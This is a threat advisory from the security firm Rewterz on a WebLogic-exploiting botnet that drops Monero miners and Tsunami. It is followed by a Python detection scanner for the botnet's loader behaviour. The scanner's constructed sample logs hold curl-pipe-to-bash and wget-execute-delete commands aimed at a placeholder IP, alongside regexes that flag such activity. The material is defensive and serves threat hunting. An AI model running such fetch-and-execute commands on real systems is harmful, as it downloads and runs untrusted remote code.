Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Medium
A botnet has been detected that propagates using a WebLogic exploit. The botnet carries two payloads: 1) Monero (XMR) miner binaries; and 2) Tsunami binaries. This botnet primarily targets cloud servers. In September, an earlier version of the botnet was exploiting misconfigured Docker APIs. Interestingly, the current version contains unused code for exploiting Redis and for brute-forcing SSH. The botnet achieves persistence in multiple ways: it kills running processes, potentially competing mining tools, and eliminates EDR. It uses base64-encoded intermediate-stage shell scripts and base64-encoded commands to download and execute Python scripts. Tsunami is added as a second payload, in addition to the Monero XMR miner.
It makes use of the Oracle WebLogic RCE exploit for CVE-2020-14882. The campaign uses multiple shell scripts and Python scripts with different drop locations and connects to binary-hosting web servers using hardcoded IP addresses and domains.
Stage 1 executes two payloads: a shell script, xms, and a Python script. The xms shell script is piped from curl to bash; if that fails, it is fetched with wget, executed, and then removed to hinder analysis. The Python script is fetched and executed using base64-encoded commands to avoid detection and analysis. The xms shell script attempts to infect hosts that the server has previously connected to. It also lists running processes to collect information about active SSH connections. The XMR miner also targets Windows servers, as evidenced by the presence of .exe binaries on the same FTP server.
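The loader behaviour described above (a remote script piped from curl into bash with a wget fallback, fetch-execute-delete chains, base64-encoded commands fed to an interpreter, and process listing for SSH sessions) is what a defender can hunt for in process-execution telemetry. The following Python scanner is an added example and is not code from the advisory or from Rewterz; the log line format (`<timestamp> uid=<n> cmd=<command line>`), the sample lines, the IP 198.51.100.7 and the rule names are all constructed for the example, and the regexes describe the behaviour the advisory reports rather than the botnet's exact strings.

```python
"""Added example: flag shell command lines that match the loader behaviour
described in the advisory. Log format and sample lines are constructed."""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Hypothetical log line format: "<timestamp> uid=<n> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+cmd=(?P<cmd>.*)$")

# Detection rules (name, regex). Each maps to a behaviour named in the advisory.
RULES = [
    # curl/wget output piped straight into a shell
    ("fetch_pipe_shell",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")),
    # fetch to a path, execute it, then rm the same path (anti-analysis)
    ("fetch_exec_remove",
     re.compile(r"\b(?:curl|wget)\b.*?;\s*(?:ba)?sh\s+(\S+)\s*;.*?\brm\b.*\1")),
    # base64-decoded blob handed to a shell or Python interpreter
    ("base64_to_interpreter",
     re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:(?:ba)?sh|python\d?)\b")),
    # process listing filtered for ssh (enumerating active SSH connections)
    ("ssh_process_enum",
     re.compile(r"\bps\b.*\|\s*grep\b.*\bssh\b")),
]

# Standalone base64-looking tokens (12+ alphabet chars, optional padding)
B64_TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")

# Constructed second-stage blob: a harmless Python one-liner, encoded at import
# time so the sample log line below carries a valid base64 token.
STAGE_B64 = base64.b64encode(b'print("stage2")').decode()

# Constructed sample telemetry; uid 1001 shows loader-like activity, uid 1002 is benign.
SAMPLE_LOG = f"""\
2020-11-03T10:01:12Z uid=1001 cmd=curl -fsSL http://198.51.100.7/xms | bash
2020-11-03T10:01:13Z uid=1001 cmd=wget -q -O /tmp/xms http://198.51.100.7/xms ; bash /tmp/xms ; rm -f /tmp/xms
2020-11-03T10:01:14Z uid=1001 cmd=echo {STAGE_B64} | base64 -d | python
2020-11-03T10:01:15Z uid=1001 cmd=ps aux | grep ssh
2020-11-03T10:02:00Z uid=1002 cmd=ls -la /var/log
2020-11-03T10:02:05Z uid=1002 cmd=echo SGVsbG8gd29ybGQ= | base64 -d
"""


@dataclass
class Finding:
    ts: str
    uid: str
    cmd: str
    rules: list = field(default_factory=list)
    decoded: list = field(default_factory=list)


def parse_line(line):
    """Split one log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def match_rules(cmd):
    """Return the names of all rules whose regex matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def decode_base64_blobs(cmd):
    """Decode base64-looking tokens that yield printable text, for analyst triage."""
    out = []
    for tok in B64_TOKEN_RE.findall(cmd):
        padded = tok + "=" * (-len(tok) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            out.append(text)
    return out


def scan_log(text):
    """Scan log text and return one Finding per line that triggers a rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        rules = match_rules(rec["cmd"])
        if rules:
            findings.append(Finding(rec["ts"], rec["uid"], rec["cmd"], rules,
                                    decode_base64_blobs(rec["cmd"])))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.ts, f.uid, ",".join(f.rules), f.cmd)
        for d in f.decoded:
            print("    decoded:", d)
```

Decoded blobs are only attached to lines that already triggered a rule, so a plain `echo ... | base64 -d` that prints to the terminal is not reported on its own; the decode step exists to give the analyst the cleartext of an intermediate stage rather than to act as a detection by itself.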